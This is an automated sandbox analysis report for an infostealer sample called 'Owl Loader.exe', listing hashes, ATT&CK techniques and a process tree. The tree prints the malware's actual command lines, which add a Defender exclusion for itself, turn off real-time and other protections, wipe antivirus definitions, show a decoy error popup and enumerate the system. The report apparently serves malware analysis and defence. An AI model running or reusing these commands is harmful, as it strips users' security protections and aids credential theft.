fa6d55a772daf2630765e6c589e6fff86fcf10cb89b0121e307edc3ef7e8eb75

Analysis

max time kernel
151s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2024 15:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Owl Loader.exe
Size

290.0MB
MD5

8d4ae87604872019fd5e23dd38bb31a5
SHA1

5c5ca09751377421dc071ae9c655a165aa4def68
SHA256

fa6d55a772daf2630765e6c589e6fff86fcf10cb89b0121e307edc3ef7e8eb75
SHA512

de9bd6e9b8a95acf1e3573d85cd58debcf1ae5de8a95289738204ca56f0bdfdd0d8444a6ab8ebcd9a269f9ff87b25b9cd1d00733173391215b50fe55f306efe0
SSDEEP

196608:hkmDZEERHvUWvozWOxu9kXwvdbDlA03Nhnqetv8wrhU0cQ0:qGLRHdKbAlbZA03bqM3Nz50

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3140	powershell.exe
1744	powershell.exe
4560	powershell.exe
1124	powershell.exe
3572	powershell.exe
592	powershell.exe
4040	powershell.exe
2076	powershell.exe
2204	powershell.exe

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Owl Loader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	‏ .scr
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4648	cmd.exe
464	powershell.exe
2424	cmd.exe
1620	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
4736	rar.exe
1448	‏ .scr
2976	‏ .scr
5020	rar.exe

Loads dropped DLL 33 IoCs

pid	Process
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
3772	Owl Loader.exe
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr
2976	‏ .scr

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
29	discord.com
30	discord.com
56	discord.com
57	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com
27	ip-api.com
50	ip-api.com
54	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 10 IoCs

discovery

Process Discovery

T1057

pid	Process
3592	tasklist.exe
3168	tasklist.exe
5080	tasklist.exe
3644	tasklist.exe
3324	tasklist.exe
4512	tasklist.exe
1852	tasklist.exe
1892	tasklist.exe
4960	tasklist.exe
3372	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4352	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023c8b-21.dat	upx
behavioral1/memory/3772-25-0x00007FFE0B2C0000-0x00007FFE0B72A000-memory.dmp	upx
behavioral1/memory/3772-29-0x00007FFE1AAB0000-0x00007FFE1AAD4000-memory.dmp	upx
behavioral1/files/0x0007000000023c7e-28.dat	upx
behavioral1/memory/3772-32-0x00007FFE23EB0000-0x00007FFE23EBF000-memory.dmp	upx
behavioral1/files/0x0007000000023c89-31.dat	upx
behavioral1/files/0x0007000000023c85-48.dat	upx
behavioral1/files/0x0007000000023c84-47.dat	upx
behavioral1/files/0x0007000000023c83-46.dat	upx
behavioral1/files/0x0007000000023c82-45.dat	upx
behavioral1/files/0x0007000000023c81-44.dat	upx
behavioral1/files/0x0007000000023c80-43.dat	upx
behavioral1/files/0x0007000000023c7f-42.dat	upx
behavioral1/files/0x0007000000023c7d-41.dat	upx
behavioral1/files/0x0007000000023c90-40.dat	upx
behavioral1/files/0x0007000000023c8f-39.dat	upx
behavioral1/files/0x0007000000023c8e-38.dat	upx
behavioral1/files/0x0007000000023c8a-35.dat	upx
behavioral1/files/0x0007000000023c88-34.dat	upx
behavioral1/memory/3772-54-0x00007FFE1AA80000-0x00007FFE1AAAC000-memory.dmp	upx
behavioral1/memory/3772-56-0x00007FFE22120000-0x00007FFE22139000-memory.dmp	upx
behavioral1/memory/3772-58-0x00007FFE1AA60000-0x00007FFE1AA7E000-memory.dmp	upx
behavioral1/memory/3772-60-0x00007FFE0B970000-0x00007FFE0BADD000-memory.dmp	upx
behavioral1/memory/3772-62-0x00007FFE1AA40000-0x00007FFE1AA59000-memory.dmp	upx
behavioral1/memory/3772-64-0x00007FFE1E790000-0x00007FFE1E79D000-memory.dmp	upx
behavioral1/memory/3772-66-0x00007FFE1A6F0000-0x00007FFE1A71E000-memory.dmp	upx
behavioral1/memory/3772-74-0x00007FFE1AAB0000-0x00007FFE1AAD4000-memory.dmp	upx
behavioral1/memory/3772-73-0x00007FFE0AF40000-0x00007FFE0B2B4000-memory.dmp	upx
behavioral1/memory/3772-71-0x00007FFE19CC0000-0x00007FFE19D76000-memory.dmp	upx
behavioral1/memory/3772-70-0x00007FFE0B2C0000-0x00007FFE0B72A000-memory.dmp	upx
behavioral1/memory/3772-77-0x00007FFE1AA20000-0x00007FFE1AA35000-memory.dmp	upx
behavioral1/memory/3772-76-0x00007FFE23EB0000-0x00007FFE23EBF000-memory.dmp	upx
behavioral1/memory/3772-80-0x00007FFE1A6E0000-0x00007FFE1A6ED000-memory.dmp	upx
behavioral1/memory/3772-79-0x00007FFE1AA80000-0x00007FFE1AAAC000-memory.dmp	upx
behavioral1/memory/3772-83-0x00007FFE0AE20000-0x00007FFE0AF38000-memory.dmp	upx
behavioral1/memory/3772-82-0x00007FFE22120000-0x00007FFE22139000-memory.dmp	upx
behavioral1/memory/3772-109-0x00007FFE1AA60000-0x00007FFE1AA7E000-memory.dmp	upx
behavioral1/memory/3772-110-0x00007FFE0B970000-0x00007FFE0BADD000-memory.dmp	upx
behavioral1/memory/3772-123-0x00007FFE1AA40000-0x00007FFE1AA59000-memory.dmp	upx
behavioral1/memory/3772-194-0x00007FFE1E790000-0x00007FFE1E79D000-memory.dmp	upx
behavioral1/memory/3772-259-0x00007FFE1A6F0000-0x00007FFE1A71E000-memory.dmp	upx
behavioral1/memory/3772-272-0x00007FFE19CC0000-0x00007FFE19D76000-memory.dmp	upx
behavioral1/memory/3772-291-0x00007FFE0AF40000-0x00007FFE0B2B4000-memory.dmp	upx
behavioral1/memory/3772-304-0x00007FFE1AA20000-0x00007FFE1AA35000-memory.dmp	upx
behavioral1/memory/3772-320-0x00007FFE1AA60000-0x00007FFE1AA7E000-memory.dmp	upx
behavioral1/memory/3772-321-0x00007FFE0B970000-0x00007FFE0BADD000-memory.dmp	upx
behavioral1/memory/3772-315-0x00007FFE0B2C0000-0x00007FFE0B72A000-memory.dmp	upx
behavioral1/memory/3772-316-0x00007FFE1AAB0000-0x00007FFE1AAD4000-memory.dmp	upx
behavioral1/memory/3772-352-0x00007FFE1AA20000-0x00007FFE1AA35000-memory.dmp	upx
behavioral1/memory/3772-360-0x00007FFE1AA60000-0x00007FFE1AA7E000-memory.dmp	upx
behavioral1/memory/3772-365-0x00007FFE19CC0000-0x00007FFE19D76000-memory.dmp	upx
behavioral1/memory/3772-364-0x00007FFE1A6F0000-0x00007FFE1A71E000-memory.dmp	upx
behavioral1/memory/3772-363-0x00007FFE1E790000-0x00007FFE1E79D000-memory.dmp	upx
behavioral1/memory/3772-362-0x00007FFE1AA40000-0x00007FFE1AA59000-memory.dmp	upx
behavioral1/memory/3772-361-0x00007FFE0B970000-0x00007FFE0BADD000-memory.dmp	upx
behavioral1/memory/3772-359-0x00007FFE22120000-0x00007FFE22139000-memory.dmp	upx
behavioral1/memory/3772-358-0x00007FFE1AA80000-0x00007FFE1AAAC000-memory.dmp	upx
behavioral1/memory/3772-357-0x00007FFE23EB0000-0x00007FFE23EBF000-memory.dmp	upx
behavioral1/memory/3772-356-0x00007FFE1AAB0000-0x00007FFE1AAD4000-memory.dmp	upx
behavioral1/memory/3772-355-0x00007FFE0AF40000-0x00007FFE0B2B4000-memory.dmp	upx
behavioral1/memory/3772-353-0x00007FFE1A6E0000-0x00007FFE1A6ED000-memory.dmp	upx
behavioral1/memory/3772-354-0x00007FFE0AE20000-0x00007FFE0AF38000-memory.dmp	upx
behavioral1/memory/3772-340-0x00007FFE0B2C0000-0x00007FFE0B72A000-memory.dmp	upx
behavioral1/memory/2976-387-0x00007FFE09590000-0x00007FFE099FA000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Crashpad\settings.dat	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2960	cmd.exe
3888	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4972	netsh.exe
3992	cmd.exe
5108	netsh.exe
5000	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4644	WMIC.exe
1972	WMIC.exe
4156	WMIC.exe
4088	WMIC.exe
5052	WMIC.exe
4832	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2392	systeminfo.exe
2960	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133798736272934125"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	taskmgr.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3888	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3572	powershell.exe
2204	powershell.exe
3572	powershell.exe
3572	powershell.exe
2204	powershell.exe
2204	powershell.exe
4040	powershell.exe
4040	powershell.exe
464	powershell.exe
464	powershell.exe
464	powershell.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
592	powershell.exe
592	powershell.exe
2416	powershell.exe
2416	powershell.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
3140	powershell.exe
4148	taskmgr.exe
3140	powershell.exe
4112	powershell.exe
4112	powershell.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3168	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3576	WMIC.exe
Token: SeSecurityPrivilege	3576	WMIC.exe
Token: SeTakeOwnershipPrivilege	3576	WMIC.exe
Token: SeLoadDriverPrivilege	3576	WMIC.exe
Token: SeSystemProfilePrivilege	3576	WMIC.exe
Token: SeSystemtimePrivilege	3576	WMIC.exe
Token: SeProfSingleProcessPrivilege	3576	WMIC.exe
Token: SeIncBasePriorityPrivilege	3576	WMIC.exe
Token: SeCreatePagefilePrivilege	3576	WMIC.exe
Token: SeBackupPrivilege	3576	WMIC.exe
Token: SeRestorePrivilege	3576	WMIC.exe
Token: SeShutdownPrivilege	3576	WMIC.exe
Token: SeDebugPrivilege	3576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3576	WMIC.exe
Token: SeRemoteShutdownPrivilege	3576	WMIC.exe
Token: SeUndockPrivilege	3576	WMIC.exe
Token: SeManageVolumePrivilege	3576	WMIC.exe
Token: 33	3576	WMIC.exe
Token: 34	3576	WMIC.exe
Token: 35	3576	WMIC.exe
Token: 36	3576	WMIC.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeIncreaseQuotaPrivilege	3576	WMIC.exe
Token: SeSecurityPrivilege	3576	WMIC.exe
Token: SeTakeOwnershipPrivilege	3576	WMIC.exe
Token: SeLoadDriverPrivilege	3576	WMIC.exe
Token: SeSystemProfilePrivilege	3576	WMIC.exe
Token: SeSystemtimePrivilege	3576	WMIC.exe
Token: SeProfSingleProcessPrivilege	3576	WMIC.exe
Token: SeIncBasePriorityPrivilege	3576	WMIC.exe
Token: SeCreatePagefilePrivilege	3576	WMIC.exe
Token: SeBackupPrivilege	3576	WMIC.exe
Token: SeRestorePrivilege	3576	WMIC.exe
Token: SeShutdownPrivilege	3576	WMIC.exe
Token: SeDebugPrivilege	3576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3576	WMIC.exe
Token: SeRemoteShutdownPrivilege	3576	WMIC.exe
Token: SeUndockPrivilege	3576	WMIC.exe
Token: SeManageVolumePrivilege	3576	WMIC.exe
Token: 33	3576	WMIC.exe
Token: 34	3576	WMIC.exe
Token: 35	3576	WMIC.exe
Token: 36	3576	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4644	WMIC.exe
Token: SeSecurityPrivilege	4644	WMIC.exe
Token: SeTakeOwnershipPrivilege	4644	WMIC.exe
Token: SeLoadDriverPrivilege	4644	WMIC.exe
Token: SeSystemProfilePrivilege	4644	WMIC.exe
Token: SeSystemtimePrivilege	4644	WMIC.exe
Token: SeProfSingleProcessPrivilege	4644	WMIC.exe
Token: SeIncBasePriorityPrivilege	4644	WMIC.exe
Token: SeCreatePagefilePrivilege	4644	WMIC.exe
Token: SeBackupPrivilege	4644	WMIC.exe
Token: SeRestorePrivilege	4644	WMIC.exe
Token: SeShutdownPrivilege	4644	WMIC.exe
Token: SeDebugPrivilege	4644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4644	WMIC.exe
Token: SeRemoteShutdownPrivilege	4644	WMIC.exe
Token: SeUndockPrivilege	4644	WMIC.exe
Token: SeManageVolumePrivilege	4644	WMIC.exe
Token: 33	4644	WMIC.exe
Token: 34	4644	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3464	mshta.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
4148	taskmgr.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe
2424	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2836 wrote to memory of 3772	2836	Owl Loader.exe	85
PID 2836 wrote to memory of 3772	2836	Owl Loader.exe	85
PID 3772 wrote to memory of 1200	3772	Owl Loader.exe	86
PID 3772 wrote to memory of 1200	3772	Owl Loader.exe	86
PID 3772 wrote to memory of 3340	3772	Owl Loader.exe	87
PID 3772 wrote to memory of 3340	3772	Owl Loader.exe	87
PID 3772 wrote to memory of 4148	3772	Owl Loader.exe	88
PID 3772 wrote to memory of 4148	3772	Owl Loader.exe	88
PID 3772 wrote to memory of 396	3772	Owl Loader.exe	90
PID 3772 wrote to memory of 396	3772	Owl Loader.exe	90
PID 3772 wrote to memory of 592	3772	Owl Loader.exe	94
PID 3772 wrote to memory of 592	3772	Owl Loader.exe	94
PID 4148 wrote to memory of 3464	4148	cmd.exe	96
PID 4148 wrote to memory of 3464	4148	cmd.exe	96
PID 396 wrote to memory of 3168	396	cmd.exe	97
PID 396 wrote to memory of 3168	396	cmd.exe	97
PID 1200 wrote to memory of 2204	1200	cmd.exe	98
PID 1200 wrote to memory of 2204	1200	cmd.exe	98
PID 592 wrote to memory of 3576	592	cmd.exe	99
PID 592 wrote to memory of 3576	592	cmd.exe	99
PID 3340 wrote to memory of 3572	3340	cmd.exe	100
PID 3340 wrote to memory of 3572	3340	cmd.exe	100
PID 3772 wrote to memory of 4368	3772	Owl Loader.exe	102
PID 3772 wrote to memory of 4368	3772	Owl Loader.exe	102
PID 4368 wrote to memory of 3952	4368	cmd.exe	104
PID 4368 wrote to memory of 3952	4368	cmd.exe	104
PID 3772 wrote to memory of 3140	3772	Owl Loader.exe	105
PID 3772 wrote to memory of 3140	3772	Owl Loader.exe	105
PID 3140 wrote to memory of 3796	3140	cmd.exe	107
PID 3140 wrote to memory of 3796	3140	cmd.exe	107
PID 3772 wrote to memory of 2028	3772	Owl Loader.exe	108
PID 3772 wrote to memory of 2028	3772	Owl Loader.exe	108
PID 2028 wrote to memory of 4644	2028	cmd.exe	110
PID 2028 wrote to memory of 4644	2028	cmd.exe	110
PID 3772 wrote to memory of 916	3772	Owl Loader.exe	111
PID 3772 wrote to memory of 916	3772	Owl Loader.exe	111
PID 916 wrote to memory of 1972	916	cmd.exe	113
PID 916 wrote to memory of 1972	916	cmd.exe	113
PID 3772 wrote to memory of 4352	3772	Owl Loader.exe	114
PID 3772 wrote to memory of 4352	3772	Owl Loader.exe	114
PID 4352 wrote to memory of 4080	4352	cmd.exe	116
PID 4352 wrote to memory of 4080	4352	cmd.exe	116
PID 3772 wrote to memory of 4564	3772	Owl Loader.exe	117
PID 3772 wrote to memory of 4564	3772	Owl Loader.exe	117
PID 4564 wrote to memory of 4040	4564	cmd.exe	119
PID 4564 wrote to memory of 4040	4564	cmd.exe	119
PID 3772 wrote to memory of 2976	3772	Owl Loader.exe	120
PID 3772 wrote to memory of 2976	3772	Owl Loader.exe	120
PID 3772 wrote to memory of 228	3772	Owl Loader.exe	121
PID 3772 wrote to memory of 228	3772	Owl Loader.exe	121
PID 3772 wrote to memory of 2852	3772	Owl Loader.exe	124
PID 3772 wrote to memory of 2852	3772	Owl Loader.exe	124
PID 3772 wrote to memory of 4648	3772	Owl Loader.exe	125
PID 3772 wrote to memory of 4648	3772	Owl Loader.exe	125
PID 3772 wrote to memory of 1536	3772	Owl Loader.exe	127
PID 3772 wrote to memory of 1536	3772	Owl Loader.exe	127
PID 2976 wrote to memory of 1892	2976	cmd.exe	130
PID 2976 wrote to memory of 1892	2976	cmd.exe	130
PID 228 wrote to memory of 5080	228	cmd.exe	131
PID 228 wrote to memory of 5080	228	cmd.exe	131
PID 2852 wrote to memory of 1620	2852	cmd.exe	132
PID 2852 wrote to memory of 1620	2852	cmd.exe	132
PID 4648 wrote to memory of 464	4648	cmd.exe	133
PID 4648 wrote to memory of 464	4648	cmd.exe	133

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2316	attrib.exe
4268	attrib.exe
3596	attrib.exe
2340	attrib.exe
4080	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2836
- C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Owl Loader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Tente novamente', 0, 'Error', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4148
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Tente novamente', 0, 'Error', 32+16);close()"
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:3464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:396
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:592
  - - C:\Windows\System32\Wbem\WMIC.exe
